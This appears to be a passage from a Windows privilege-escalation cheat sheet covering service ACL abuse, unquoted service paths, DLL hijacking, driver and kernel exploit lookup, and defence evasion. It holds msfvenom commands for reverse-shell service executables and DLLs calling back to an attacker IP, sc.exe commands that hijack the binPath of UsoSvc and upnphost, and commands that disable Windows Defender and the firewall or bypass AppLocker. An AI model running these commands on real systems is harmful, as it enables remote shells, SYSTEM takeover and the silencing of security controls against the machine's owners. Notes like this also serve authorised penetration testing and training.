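Test-ServiceSddl -Name 'ConstructedSvc' -Sddl $weak       # Principal AU, Rights SERVICE_CHANGE_CONFIG
# live: Get-WeakServiceAcl | Format-Table -AutoSize
```

to also catch ACEs granted to your specific user or to a custom group you are in, pass the SIDs from whoami /groups /fo csv as -LowPrivPrincipals. deny ACEs are ignored here, so a hit is a candidate to confirm with sc.exe config, not a guarantee.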
once you found a vulnerable service, you could escalate by changing for example the binPath attribute:
create a malicious service executable:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.13.37 LPORT=1337 -f exe-service -o shell_svc.exe
# CVE-2019-1322 UsoSvc - Windows 10
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config UsoSvc binPath="C:\Windows\System32\spool\drivers\color\shell_svc.exe"
PS C:\Windows\system32> sc.exe qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spool\drivers\color\shell_svc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
# upnphost on Windows XP
C:\> sc.exe config upnphost binpath= "C:\Windows\System32\spool\drivers\color\shell_svc.exe"
C:\> sc.exe config upnphost obj= ".\LocalSystem" password= ""
C:\> sc.exe qc upnphost
C:\> sc.exe config upnphost depend= ""
C:\> sc.exe start upnphost
unquoted paths
if the path to an executable isn't quoted and contains spaces, windows cannot tell where the executable name ends and the arguments begin, so CreateProcess tries each prefix that ends at a space (with .exe appended) before the full path.
for example, if the path is C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
(i’m referring to this exploit)
then windows will try executing:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\IObit.exe
C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
we can take advantage of this behavior if we have write privileges to C:\Program Files (x86)\IObit\
# check for unquoted paths in services
PS C:\> wmic service get name,pathname | select-string -notmatch '"|^$'
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'
# check only non-windows services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string -notmatch 'C:\\Windows|"|^$'
# check only auto started services
PS C:\> wmic service get name,displayname,pathname,startmode | select-string "auto" | select-string -notmatch 'C:\\Windows|"|^$'
if any of the paths don’t have quote around them and have spaces in it, check if you can write to the unquoted path (icacls)
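an added example (mine, not from the page) that does the whole check in one go: for every service it expands the unquoted path into the candidates listed above, then probes whether the parent directory of each candidate is writable by actually creating and deleting a zero-byte file (which is the most reliable test, but leaves a trace on disk; use icacls instead on an engagement where that matters). the page's IObit path is used as the offline demo input.

```powershell
# Added example, not from the page: expand unquoted service paths into the candidates
# CreateProcess tries, and probe whether each candidate's directory is writable.
function Get-UnquotedPathCandidates {
    param([string]$PathName)
    if (-not $PathName -or $PathName -match '^"') { return @() }           # empty or quoted: nothing to hijack
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }   # drop trailing arguments
    if ($exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    # "C:\Program Files\A B\x.exe" -> C:\Program.exe, C:\Program Files\A.exe, ...
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

function Test-DirectoryWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('~' + [guid]::NewGuid().ToString('N'))
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; $true } catch { $false }
}

function Get-UnquotedServicePath {
    foreach ($s in Get-CimInstance Win32_Service) {
        foreach ($cand in Get-UnquotedPathCandidates -PathName ([string]$s.PathName)) {
            [pscustomobject]@{
                Service   = $s.Name
                RunsAs    = $s.StartName
                StartMode = $s.StartMode
                Candidate = $cand
                Writable  = Test-DirectoryWritable (Split-Path -Parent $cand)
            }
        }
    }
}

# the page's own example path, offline
Get-UnquotedPathCandidates 'C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe'
# C:\Program.exe
# C:\Program Files.exe
# C:\Program Files (x86)\IObit\IObit.exe
# live: Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

a writable candidate whose service runs as LocalSystem with StartMode Auto is the target: drop the service exe from above under the candidate name and restart the service (or wait for a reboot).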
dll hijacking
when a windows process loads a dll by name (and the dll is not already loaded and not on the KnownDLLs list, which always comes from System32), the loader searches the following locations in order (SafeDllSearchMode, the default):
- the directory the executable was loaded from
- C:\Windows\System32
- C:\Windows\System (the 16-bit system directory)
- C:\Windows
- the current working directory
- the directories in the system PATH, then the user PATH, left to right
so if you can write to one of those directories (a system folder, or a non-default program install directory like C:\Python27 that has loose permissions) and a process running as SYSTEM loads a dll from there, you can get SYSTEM privileges by planting a malicious dll. a missing dll (NAME NOT FOUND in procmon) in a directory you control is the ideal case; restarting the service running as SYSTEM, or a reboot, triggers the load.
to check for privileges use icacls
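an added example (mine, not from the page) that prints the search order above for a given executable, checks each directory's ACL against the current token for the right to create files, and warns if the dll name is on the KnownDLLs list, in which case no search happens at all. the python.exe path and version.dll name in the usage line are hypothetical inputs; the registry keys are the real SafeDllSearchMode and KnownDLLs locations.

```powershell
# Added example, not from the page: list the loader's DLL search order for an executable and
# flag directories the current token can create files in, using the directory ACL.
function Test-WriteAccessByAcl {
    param([string]$Dir)
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    # note: deny-only groups of a filtered admin token also show up here, so a medium-integrity
    # admin shell can get a false positive for admin-only directories; confirm with icacls
    $mine = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    try { $acl = Get-Acl -LiteralPath $Dir -ErrorAction Stop } catch { return $false }
    $allow = $false
    foreach ($ace in $acl.Access) {
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($mine -notcontains $sid) { continue }
        # CreateFiles/WriteData is bit 0x2; Write, Modify and FullControl all include it.
        # Generic rights (GENERIC_WRITE etc.) do not carry the bit and are not detected here.
        if (([int]$ace.FileSystemRights -band 0x2) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }   # an applicable deny wins
        $allow = $true
    }
    return $allow
}

function Get-DllSearchOrder {
    param([Parameter(Mandatory)][string]$ExePath, [string]$DllName)
    $app   = Split-Path -Parent $ExePath
    $sys   = [Environment]::GetFolderPath('System')                  # C:\Windows\System32
    $win   = [Environment]::GetFolderPath('Windows')
    $sys16 = Join-Path $win 'System'
    $cwd   = (Get-Location).Path
    $pathDirs = @($env:Path -split ';' | Where-Object { $_ })
    $safe = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager' -ErrorAction SilentlyContinue).SafeDllSearchMode
    # SafeDllSearchMode = 0 is the legacy order, with the current directory searched second
    $dirs = if ($safe -eq 0) { @($app, $cwd, $sys, $sys16, $win) + $pathDirs } else { @($app, $sys, $sys16, $win, $cwd) + $pathDirs }

    $known = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs' -ErrorAction SilentlyContinue).PSObject.Properties |
        Where-Object { $_.Value -is [string] -and $_.Value -like '*.dll' } | ForEach-Object { $_.Value }
    if ($DllName -and ($known -contains $DllName)) {
        Write-Warning "$DllName is a KnownDLL: it is always resolved from System32, search order does not apply"
    }
    $i = 0
    foreach ($d in $dirs) {
        $i++
        [pscustomobject]@{
            Order     = $i
            Directory = $d
            Exists    = Test-Path -LiteralPath $d -PathType Container
            Writable  = Test-WriteAccessByAcl $d
        }
    }
}

# hypothetical target: a python install in a non-default directory, asking for version.dll
Get-DllSearchOrder -ExePath 'C:\Python27\python.exe' -DllName 'version.dll' | Format-Table -AutoSize
```

a Writable directory that comes before the one holding the real dll (or any writable directory, if the dll is missing) is where the malicious dll goes; PATH entries are the ones most often overlooked.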
create malicious dll:
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.13.37 LPORT=1337 -f dll -o malicious.dll
scheduled tasks
check scheduled tasks for anything interesting
PS C:\> schtasks /query /fo LIST
PS C:\> Get-ScheduledTask
startup
check startup programs for anything out of the ordinary
PS C:\> wmic startup
PS C:\> wmic startup get caption,command
PS C:\> Get-ChildItem "C:\Users\*\Start Menu\Programs\Startup" # check all users startup dirs
exploits
vulnerable software
get a list of installed software on the machine:
PS C:\> get-package | select-object name,version # will list installed software and versions
PS C:\> Get-ChildItem HKLM:\SOFTWARE | ft Name # check the registry too
PS C:\> ls -force -Path 'C:\Program Files*\*' | ft Parent,Name,LastWriteTime # also the program directories
the list can then be cross-checked against exploit-db, and look for local privilege escalation vulnerabilities like unquoted paths or insecure permissions.
vulnerable drivers
check if any vulnerable drivers are installed. since they run in SYSTEM context, they can be a good target for exploitation.
PS C:\> driverquery # get a list of installed drivers
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name' | fl
PS C:\> driverquery /v /fo csv | ConvertFrom-CSV | Select-Object 'Module Name', 'Display Name', 'Start Mode', 'Path' | fL
PS C:\> DriverQuery.exe --no-msft # OffensiveCSharp DriverQuery
[+] Enumerating driver services...
[+] Checking file signatures...
Intel(R) Serial IO GPIO Controller Driver
Service Name: iaLPSSi_GPIO
Path: C:\Windows\System32\drivers\iaLPSSi_GPIO.sys
Version: 1.1.250.0
Creation Time (UTC): 7/16/2016 1:18:02 PM
Cert Issuer: CN=Intel External Basic Issuing CA 3B, O=Intel Corporation, L=Santa Clara, S=CA, C=US
Signer: CN=Intel Corporation - Client Components Group, O=Intel Corporation, L=Santa Clara, S=CA, C=US
PS C:\> DriverQuery.exe --no-msft | select-string 'name|version|^$' # get name/version list
Service Name: iaLPSSi_GPIO
Version: 1.1.250.0
Service Name: pvscsi
Version: 1.3.15.0
Service Name: vm3dmp
Version: 8.16.01.0024
Service Name: vm3dmp-debug
Version: 8.16.01.0024
Service Name: vm3dmp-stats
Version: 8.16.01.0024
Service Name: vm3dmp_loader
Version: 8.16.01.0024
Service Name: vmci
Version: 9.8.16.0
Service Name: VMMemCtl
Version: 7.4.2.0
Service Name: vmmouse
Version: 12.5.7.0
Service Name: vmusbmouse
Version: 12.5.4.0
Service Name: vsock
Version: 9.8.16.0
windows kernel exploits
PS C:\> systeminfo | Select-String "os name|os version|system type"
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
System Type: x64-based PC
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
PS C:\> wmic qfe get HotFixID
HotFixID
KB3199986
KB4049065
KB4520724
KB4571694
then use searchsploit, or search online for an exploit based on these. for example, searches based on this output could be:
windows server 2016 "10.0.14393" exploit
KB4571694 site:microsoft.com
also check the following resources:
antivirus and other mitigations
windows defender
# see if windows defender is running
PS C:\> Get-Service windefend
Status Name DisplayName
------ ---- -----------
Running windefend Windows Defender Service
# check status
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : True
IoavProtectionEnabled : True
NISEnabled : True
OnAccessProtectionEnabled : True
RealTimeProtectionEnabled : True
# check preferences
PS C:\> Get-MpPreference | findstr /i "disable enable scan" | findstr /i "true false"
CheckForSignaturesBeforeRunningScan : False
DisableArchiveScanning : False
DisableAutoExclusions : False
DisableBehaviorMonitoring : False
DisableBlockAtFirstSeen : False
DisableCatchupFullScan : True
DisableCatchupQuickScan : True
DisableDatagramProcessing : False
DisableEmailScanning : True
DisableIOAVProtection : False
DisablePrivacyMode : False
DisableRealtimeMonitoring : False
DisableRemovableDriveScanning : True
DisableRestorePoint : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles : False
DisableScriptScanning : False
EnableFileHashComputation : False
EnableLowCpuPriority : False
ScanOnlyIfIdleEnabled : True
SignatureDisableUpdateOnStartupWithoutEngine : False
# disable defender script scanning, which is what acts on the AMSI submissions from powershell (needs admin and tamper protection off, otherwise access denied)
PS C:\> Set-MpPreference -DisableScriptScanning $true
PS C:\> Get-MpPreference | findstr /i "scanning"
DisableArchiveScanning : False
DisableEmailScanning : True
DisableRemovableDriveScanning : True
DisableScanningMappedNetworkDrivesForFullScan : True
DisableScanningNetworkFiles : False
DisableScriptScanning : True
# disable realtime monitoring (can get access denied)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true # change to $false to re-enable
PS C:\> Get-MpComputerStatus | findstr /i "disabled enabled"
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : False
IoavProtectionEnabled : False
NISEnabled : False
OnAccessProtectionEnabled : False
RealTimeProtectionEnabled : False
# add excluded path
PS C:\> Add-MpPreference -ExclusionPath "C:\Users\joe"
firewall
# check if firewall is enabled
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings:
State ON
Firewall Policy BlockInbound,AllowOutbound
Private Profile Settings:
State ON
Firewall Policy BlockInbound,AllowOutbound
Public Profile Settings:
State ON
Firewall Policy BlockInbound,AllowOutbound
# disable it (might get access denied)
PS C:\> netsh advfirewall set allprofiles state off
PS C:\> netsh advfirewall show allprofiles | Select-String "profile|state|policy"
Domain Profile Settings:
State OFF
Firewall Policy BlockInbound,AllowOutbound
Private Profile Settings:
State OFF
Firewall Policy BlockInbound,AllowOutbound
Public Profile Settings:
State OFF
Firewall Policy BlockInbound,AllowOutbound
applocker
# see applocker rules
PS C:\> Get-AppLockerPolicy -Effective
PS C:\> Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
since everything under C:\Windows\
is allowed by default, with basic settings it can be bypassed trivially by using common writable directories:
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
tools
Windows SysInternals
OffensiveCSharp
LOLBAS
wesng
2021-04-25 09:04